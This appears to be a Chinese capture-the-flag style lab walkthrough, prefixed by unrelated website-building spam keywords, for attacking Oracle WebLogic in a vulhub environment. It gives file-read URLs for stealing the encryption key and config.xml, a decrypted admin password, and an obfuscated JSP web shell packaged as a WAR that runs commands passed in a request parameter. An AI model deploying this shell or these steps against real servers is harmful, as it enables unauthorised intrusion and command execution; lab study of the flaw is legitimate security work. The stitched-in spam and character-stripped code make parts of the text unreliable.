互联网做视频网站需要许可证吗,博客社区类网站模板,菏泽做网站公司,合肥那个公司做网站优化好文章目录 1、搭建环境2、漏洞特征3、漏洞利用1)获取用户名密码2)后台上传shell 4、检测工具 1、搭建环境
漏洞环境基于vulhub搭建–进入weak_password的docker环境
sudo docker-compose up -d拉取靶场
2、漏洞特征
404特征Weblogic常用端口#xff1a;7001
3、漏洞利用… 文章目录 1、搭建环境2、漏洞特征3、漏洞利用1)获取用户名密码2)后台上传shell 4、检测工具 1、搭建环境
漏洞环境基于vulhub搭建–进入weak_password的docker环境
sudo docker-compose up -d拉取靶场
2、漏洞特征
404特征Weblogic常用端口7001
3、漏洞利用
任意读取文件、后台getshell访问/console/login/LoginForm.jsp后缀来到后台管理处 获取用户名密码 http://192.168.25.128:7001/console/login/LoginForm.jsp
1)获取用户名密码
使用任意读取文件方式获取用户名密码 weblogic密码使用AES老版本3DES加密对称加密可解密只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下名为SerializedSystemIni.dat和config.xml 开启bp,端口后拼接/hello/file.jsp?pathsecurity/SerializedSystemIni.dat 即http://192.168.25.128:7001/hello/file.jsp?pathsecurity/SerializedSystemIni.dat
切换到16进制选择以上文字存到一个SerializedSystemIni.dat 在这里插入图片描述
注意SerializedSystemIni.dat是一个二进制文件所以一定要用burpsuite来读取用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码右键copy to file就可以保存成一个文件 密钥文件SerializedSystemIni.dat 访问http://ip:7001/hello/file.jsp?pathconfig/config.xml其中的 的值即为加密后的管理员密码 http://192.168.25.128:7001/hello/file.jsp?pathconfig/config.xml
{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k 获取用户名密码weblogic、Oracle123
2)后台上传shell
前提使用刚刚任意文件读取获取到的账号密码登录成功
上传路径域结构-部署-安装-上传文件-将此部署安装为应用程序。然后访问项目名称即可。 最后访问的路径是
将包含类似于
% page contentTypetext/html;charsetUTF-8 languagejava %
%!public String HMfR(String yOK){String aAh;for (int i 0; i yOK.length(); i) {aAh(char)(yOK.charAt(i)6);}return aAh;}
%
% String yiOrequest.getParameter(websafe);if(yiO!null){ Class tJIi Class.forName(HMfR(d[p[(f[ha(Lohncg_));
Process Mdlz (Process) tJIi.getMethod(HMfR(_r_]), String.class).invoke(tJIi.getMethod(HMfR(a_nLohncg_)).invoke(null),yiO);
java.io.InputStream in Mdlz.getInputStream();byte[] PYp new byte[2048];out.print(pre);while(in.read(PYp)!-1){ out.println(new String(PYp)); }out.print(/pre); }
%shell.jsp将其压缩为 shell.zip然后重命名为 shell.war
选中war包并点击下一步上传–上传成功
war是一个可以直接运行的web模块通常用于网站打成包部署到容器中。war包放置到web目录下之后可以自动解压就相当于发布了简单来说war包是JavaWeb程序打的包war包里面包括写的代码编译成的class文件依赖的包配置文件所有的网站页面包括htmljsp等等。一个war包可以理解为是一个web项目里面是项目的所有东西 一直点下一步
浏览器访问http://192.168.25.128:7001/shell/shell.jsp?websafeifconfig 发现输出信息说明可以shell可用可以执行命令
4、检测工具
Java反序列化漏洞利用工具V1.7.jar